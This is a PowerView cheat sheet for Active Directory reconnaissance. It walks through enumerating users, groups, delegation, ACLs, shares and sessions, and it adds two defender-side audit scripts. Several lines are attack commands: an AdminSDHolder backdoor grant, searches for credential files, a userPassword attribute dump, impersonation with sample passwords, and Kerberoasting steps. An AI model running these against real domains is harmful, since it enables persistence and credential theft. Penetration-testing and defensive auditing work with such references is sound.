PowerView

Load, help, and creds

- Import PowerView into the current session.
- Show detailed help for a function.
- Build an alternate credential object for any PowerView function.
    $SecPassword = ConvertTo-SecureString 'BurgerBurgerBurger!' -AsPlainText -Force
    $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Domain, forest, DCs, sites

- Query info about the current domain.
- Query info about a specified (child) domain.
- List domain controllers for the current domain.
- Get forest-level information.
- List all domains in the forest.
- List forest trusts.
- List domain trusts (like nltest /trusted_domains).
- Recursively map reachable domain trusts.
- Enumerate AD sites.
- Enumerate AD subnets.
- List global catalog servers in the forest.

Policy (password/Kerberos)

- Read Kerberos policy from domain policy.
- Read password/lockout policy (SystemAccess) from domain policy.

Users (filters, UAC, SPN/AS-REP)

- Enumerate users with useful props (UPN, enabled, last logon).
- Users with passwords not changed in >1 year.
    $Date = (Get-Date).AddYears(-1).ToFileTime()
    Get-DomainUser -LDAPFilter "(pwdlastset<=$Date)" -Properties samaccountname,pwdlastset
- Enabled users only (userAccountControl bit 2, ACCOUNTDISABLE, not set), returning DNs.
    Get-DomainUser -LDAPFilter "(!userAccountControl:1.2.840.113556.1.4.803:=2)" -Properties distinguishedname
- Users that do not require a smart card for logon (userAccountControl bit 262144, SMARTCARD_REQUIRED, not set).
    Get-DomainUser -LDAPFilter "(!useraccountcontrol:1.2.840.113556.1.4.803:=262144)" -Properties samaccountname
- Pipe mixed identities (SID, DN, GUID, samaccountname) into Get-DomainUser.
    'S-1-5-21-890171859-3433809279-3366196753-1114','CN=dfm,CN=Users,DC=testlab,DC=local','4c435dd7-dc58-4b14-9a5e-1fdb0e80d201','administrator' | Get-DomainUser -Properties samaccountname,lastlogoff
Groups and membership

- List groups with "admin" in the name.
- List protected (AdminSDHolder) groups.
- List groups that don't have a global scope.
- List all groups a user/group effectively belongs to (tokenGroups).
- Same as above with a DN identity.
- Recursively enumerate group members of Domain Admins.

Foreign users/groups (cross-domain)

- Find users from foreign domains present in this domain.
- Find groups in target domain that have foreign members.
- List foreignSecurityPrincipals from the GC (for SID/DN correlation).
    Get-DomainObject -Properties objectsid,distinguishedname -SearchBase "GC://corp.local" -LDAPFilter '(objectclass=foreignSecurityPrincipal)'
Computers (targeting, delegation)

- Inventory computers with helpful props.
- Filter by OS for servers.
- Computers allowing unconstrained delegation.
- Computers trusted to authenticate for others (constrained delegation).
- Computers with specific SPNs (e.g., SQL).
- List computers from a specific OU.

Sessions, local groups, shares (who/where, not process list)

- Enumerate SMB sessions on a remote host.
- Enumerate logged-on users on a host.
- Enumerate current RDP sessions (and source IPs).
- List local groups on a host.
- List members of a local group (default WinNT provider).
- Faster local group member enumeration via Win32 API.
- Enumerate shares on a host.

User hunting (old Invoke-UserHunter)

- Show all user locations across the domain (noisy).
- Focus on unconstrained delegation computers and show users.
- Hunt for admin users who allow delegation on unconstrained hosts.
- Hunt a specific user and check if you have local admin where found.
- Get logged-on users for all "server" OUs in a domain.
    Get-DomainOU -Identity *server* -Domain corp.local | % {
        Get-DomainComputer -SearchBase $_.distinguishedname -Properties dnshostname | % {
            Get-NetLoggedOn -ComputerName $_.dnshostname
        }
    }
Shares and file discovery

- Enumerate open shares domain-wide.
- Enumerate only shares you can read.
- Search domain shares for interesting files (old Invoke-FileFinder).
- Same, with alternate credentials.
    $Password = "PASSWORD" | ConvertTo-SecureString -AsPlainText -Force
    $Credential = New-Object System.Management.Automation.PSCredential("CORP\user", $Password)
    Find-InterestingDomainShareFile -Domain CORP -Credential $Credential
- Search a single share for interesting files (keyword names, office documents) accessed in the last 7 days.
    Find-InterestingFile -Path \\SERVER\Share -Include password,creds,secret -OfficeDocs -LastAccessTime (Get-Date).AddDays(-7)
GPOs, GP links, access mapping

- List all GPOs in the domain.
- List OUs and their GPO links.
- List policies applied to a specific computer.
- Map where a user/group has local group rights via GPO (old Find-GPOLocation).
- Check RDP group mapping for a user in a domain.
- Export a CSV of GPO mappings with flattened computer arrays.
    Get-DomainGPOUserLocalGroupMapping | % { $_.computers = ($_.computers -join ", "); $_ } | Export-Csv -NoTypeInformation gpo_map.csv
Delegation reconnaissance

- Users with constrained delegation configured.
- Computers with constrained delegation configured.
- Admin-protected users who are allowed to be delegated (interesting).

ACLs, DCSync rights, AdminSDHolder, backdooring

- Enumerate who has rights over a target object (resolve GUIDs).
- Grant "will" the right to reset "matt"'s password.
- Read AdminSDHolder permissions (resolve GUIDs).
- Backdoor AdminSDHolder to grant "matt" full rights to protected objects.
    Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -PrincipalIdentity matt -Rights All
- Find principals holding replication (DCSync) extended rights or GenericAll on the dev.testlab.local domain head (the resolved right name is in ObjectAceType).
    Get-DomainObjectAcl "dc=dev,dc=testlab,dc=local" -ResolveGUIDs | ? { ($_.ObjectAceType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll') }
- Same check on testlab.local via the legacy Get-ObjectACL alias.
    Get-ObjectACL "DC=testlab,DC=local" -ResolveGUIDs | ? { ($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ObjectAceType -match 'Replication-Get') }
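A defender-side audit of the two objects this section targets, added here as an example and not part of PowerView: it walks the domain head and AdminSDHolder ACLs, drops the principals that legitimately hold replication or full-control rights, and reports everything else. It assumes PowerView 3.x is loaded; the function name, the well-known SID/RID allow-list and the AllowSid parameter are mine.

```powershell
# Added example, not PowerView project code. Assumes PowerView 3.x is loaded
# (Get-Domain, Get-DomainObjectAcl, ConvertFrom-SID) and read access to the domain.
function Find-UnexpectedPrivilegedAce {
    [CmdletBinding()]
    param(
        # Extra SIDs that are legitimate in your environment (e.g. a directory sync account).
        [string[]] $AllowSid = @()
    )
    # Domain head DN built from the domain name, e.g. testlab.local -> DC=testlab,DC=local
    $DomainDN = 'DC=' + ((Get-Domain).Name -replace '\.', ',DC=')
    # Principals expected to hold replication or full-control rights:
    # Enterprise Domain Controllers, SYSTEM, BUILTIN\Administrators, plus caller-supplied SIDs
    $WellKnownSid = @('S-1-5-9', 'S-1-5-18', 'S-1-5-32-544') + $AllowSid
    # ...and domain RIDs 498/521 (RODC groups), 512 Domain Admins, 516 Domain Controllers, 519 Enterprise Admins
    $WellKnownRid = '^S-1-5-21-\d+-\d+-\d+-(498|512|516|519|521)$'
    $Targets = @(
        @{ Name = 'Domain head (DCSync / control)';    DN = $DomainDN }
        @{ Name = 'AdminSDHolder (protected template)'; DN = "CN=AdminSDHolder,CN=System,$DomainDN" }
    )
    foreach ($T in $Targets) {
        Get-DomainObjectAcl -Identity $T.DN -ResolveGUIDs |
            Where-Object {
                # Allow ACEs only: replication extended rights, or rights that let the holder grant them
                $_.AceQualifier -ne 'AccessDenied' -and
                (($_.ObjectAceType -match 'Replication-Get') -or
                 ($_.ActiveDirectoryRights -match 'GenericAll|GenericWrite|WriteDacl|WriteOwner'))
            } |
            Where-Object {
                $Sid = $_.SecurityIdentifier.Value
                ($WellKnownSid -notcontains $Sid) -and ($Sid -notmatch $WellKnownRid)
            } |
            ForEach-Object {
                [pscustomobject]@{
                    Target    = $T.Name
                    Principal = ConvertFrom-SID $_.SecurityIdentifier.Value
                    Sid       = $_.SecurityIdentifier.Value
                    Rights    = $_.ActiveDirectoryRights
                    AceType   = $_.ObjectAceType
                    Inherited = $_.IsInherited
                }
            }
    }
}

# Anything returned deserves a ticket: Replication-Get* on the domain head means the principal
# can DCSync; write rights on AdminSDHolder are copied to every protected account by SDProp.
Find-UnexpectedPrivilegedAce | Format-Table -AutoSize
```

Run it with -AllowSid for any service account (directory sync, backup) that is known to hold these rights so only the surprises remain.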
GPP and GPP-linked computers

- Recover any stored Group Policy Preferences passwords (legacy).
- Resolve all computer DNS hostnames where a given GPP/GPO applies by GUID.
    Get-DomainOU -GPLink '<GPP_GUID>' | % { Get-DomainComputer -SearchBase $_.distinguishedname -Properties dnshostname }
Interesting ACLs and shadow admins

- Find interesting domain ACLs (write/owner/DACL rights) and resolve GUIDs.
- Flag GPOs where "user" SIDs (>1000) have modification/control rights.
    Get-DomainObjectAcl -LDAPFilter '(objectCategory=groupPolicyContainer)' | ? { ($_.SecurityIdentifier -match '^S-1-5-.*-[1-9]\d{3,}$') -and ($_.ActiveDirectoryRights -match 'WriteProperty|GenericAll|GenericWrite|WriteDacl|WriteOwner') }
OU, file servers, DNS

- List organizational units.
- Find likely file servers based on user home/profile/script paths.
- Enumerate DNS records for a zone (if DNS partition accessible).

Trust-aware foreign membership walk

- Pull foreignSecurityPrincipal DNs from the GC, then, for each domain they were added to, list the domain-local groups that contain them.
    $ForeignUsers = Get-DomainObject -Properties objectsid,distinguishedname -SearchBase "GC://testlab.local" -LDAPFilter '(objectclass=foreignSecurityPrincipal)' | ? { $_.objectsid -match '^S-1-5-.*-[1-9]\d{2,}$' } | Select-Object -ExpandProperty distinguishedname
    $Domains = @{}
    $ForeignMemberships = ForEach ($ForeignUser in $ForeignUsers) {
        # extract the domain the foreign principal was added to from its DN
        $ForeignUserDomain = $ForeignUser.Substring($ForeignUser.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'
        # query each domain only once
        if (-not $Domains[$ForeignUserDomain]) {
            $Domains[$ForeignUserDomain] = $True
            # domain-local groups in that domain with any of the foreign principals as a member
            $Filter = "(|(member=" + ($ForeignUsers -join ")(member=") + "))"
            Get-DomainGroup -Domain $ForeignUserDomain -Scope DomainLocal -LDAPFilter $Filter -Properties distinguishedname,member
        }
    }
    $ForeignMemberships | fl
User impersonation helpers (STA)

- Temporarily impersonate a different credential (runas /netonly-like).
    $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
    $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
    Invoke-UserImpersonation -Credential $Cred
Object outliers, setters, ownership

- Detect outlier properties across computer objects.
- Set arbitrary attributes on an AD object.
- Take or set ownership of an AD object.

Kerberoasting and AS-REP roast

- Kerberoast using defaults (prints TGS hashes).
- Kerberoast a specific account, Hashcat format.
- Kerberoast scoped to a specific OU/SearchBase.
- List AS-REP roastable users (no preauth).
- Request AS-REP roast for a specific user.

Local admin reachability

- Threaded probe to find where you're local admin (SMB/RPC).
- Test admin access to a single host.

Turn short names into FQDNs via GC

- Resolve bare hostnames to FQDNs using the global catalog.
    gc .\computers.txt | % { Get-DomainComputer -SearchBase "GC://GLOBAL.CATALOG" -LDAPFilter "(name=$_)" -Properties dnshostname }
Data export/import

- Export objects to XML for offline analysis.
- Re-import exported PowerView objects.

Password attribute probe (rare, but occasionally exposed)

- Dump userPassword attribute (if present) and render ASCII.
    $FormatEnumerationLimit = -1
    Get-DomainUser -LDAPFilter '(userPassword=*)' -Properties samaccountname,memberof,userPassword | % {
        Add-Member -InputObject $_ NoteProperty 'Password' "$([System.Text.Encoding]::ASCII.GetString($_.userPassword))" -PassThru
    } | fl
Common pipelines and counts

- Count total domain users quickly.
- Find non-empty user description fields.

Process enumeration (not a PowerView function)

PowerView 3.x has no Get-NetProcess; use native remoting/WMI/CIM:

- Get processes on a remote host via WinRM (PowerShell remoting).
- Query processes via CIM (WSMan) on a remote host.
- Query processes via legacy WMI (DCOM) on a remote host.
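The native replacement described above, as an added example that is not PowerView code: a CIM-based process lister that tries WS-Man first and falls back to DCOM, which is the transport the legacy WMI cmdlets use. It uses only built-in cmdlets; the function name and the SERVER01 host are mine, and it assumes admin rights on the targets.

```powershell
# Added example, not PowerView project code; built-in cmdlets only. Lists processes on
# remote hosts over CIM, trying WS-Man (WinRM) first and falling back to DCOM (the
# transport legacy Get-WmiObject uses). Assumes you hold admin rights on the targets.
function Get-RemoteProcessList {
    param(
        [Parameter(Mandatory)] [string[]] $ComputerName,
        [pscredential] $Credential
    )
    foreach ($Computer in $ComputerName) {
        $Common = @{ ComputerName = $Computer; ErrorAction = 'Stop' }
        if ($Credential) { $Common.Credential = $Credential }
        try {
            # WS-Man: TCP 5985/5986, Kerberos by default, firewall-friendly
            $Session = New-CimSession @Common
            $Transport = 'WSMan'
        } catch {
            try {
                # DCOM: TCP 135 plus dynamic RPC ports; what Get-WmiObject uses under the hood
                $Session = New-CimSession @Common -SessionOption (New-CimSessionOption -Protocol Dcom)
                $Transport = 'DCOM'
            } catch {
                Write-Warning "$Computer unreachable over WS-Man and DCOM: $_"
                continue
            }
        }
        try {
            Get-CimInstance -CimSession $Session -ClassName Win32_Process | ForEach-Object {
                # GetOwner is a per-process WMI method call; ReturnValue 0 means it succeeded
                $Owner = Invoke-CimMethod -InputObject $_ -MethodName GetOwner
                $OwnerName = if ($Owner.ReturnValue -eq 0) { "$($Owner.Domain)\$($Owner.User)" } else { $null }
                [pscustomobject]@{
                    Computer  = $Computer
                    Transport = $Transport
                    PID       = $_.ProcessId
                    Name      = $_.Name
                    Owner     = $OwnerName
                    Path      = $_.ExecutablePath
                }
            }
        } finally {
            Remove-CimSession -CimSession $Session
        }
    }
}

# The three bullets above as plain one-liners, for comparison (SERVER01 is a placeholder):
#   Invoke-Command -ComputerName SERVER01 -ScriptBlock { Get-Process }   # WinRM remoting
#   Get-CimInstance -ClassName Win32_Process -ComputerName SERVER01      # CIM over WS-Man
#   Get-WmiObject -Class Win32_Process -ComputerName SERVER01            # legacy WMI over DCOM
Get-RemoteProcessList -ComputerName 'SERVER01' | Format-Table -AutoSize
```

The Transport column tells you which path succeeded, which is useful when an IR triage host is reachable only over one of the two.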